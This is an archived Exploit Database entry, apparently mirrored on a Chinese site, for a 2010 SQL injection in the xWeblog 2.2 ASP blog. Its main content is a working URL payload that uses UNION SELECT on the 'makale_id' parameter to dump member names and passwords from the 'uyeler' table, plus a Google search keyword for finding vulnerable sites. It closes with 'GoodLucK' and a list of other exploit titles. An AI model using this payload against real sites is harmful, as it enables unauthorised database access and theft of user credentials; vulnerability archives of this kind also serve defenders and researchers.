xWeblog 2.2 – ‘oku.asp?makale_id’ SQL Injection

Exploit Database
34 阅读

作者： KnocKout

日期： 2010-10-07
类别：
- webapps
平台：
- asp
来源：https://www.exploit-db.com/exploits/15218/

===================================================
xWeblog v2.2 - Remote SQL Injection Vulnerability (tr) 
===================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : xWeblog v2.2
~Software: http://www.aspdunyasi.com/goster.asp?id=19
~Vulnerability Style : (SQLi)
~Google Keywords : "XWEBLOG"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
~~~~~~~~ Explotation ~~~~~~~~~~~
 
SQL Injection
================================
http://TARGET/path/oku.asp?makale_id=-67%20UNION%20SELECT+0,AD,SIFRE,3,4,5,6,7,8,9,10,11,12%20from%20uyeler
================================
[+]SQL Injected!
 
 
 
GoodLucK ;)


# Inj3ct0r.com [2010-09-28]

last Exploits
xWeblog 2.2 – ‘oku.asp?makale_id’ SQL Injection的更多信息

News Portal v4.0 – SQL Injection (Unauthorized)：
WordPress Plugin Realty – Blind SQL Injection：
Geneko Routers – Path Traversal：
Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting：
TigerCom iFolder+ 1.2 iOS – Multiple Vulnerabilities：
WordPress Plugin BackWPUp 2.1.4 – Code Execution：
PHPCOIN 1.2.1 – ‘mod.php’ SQL Injection：
CMScontrol 7.x – Arbitrary File Upload：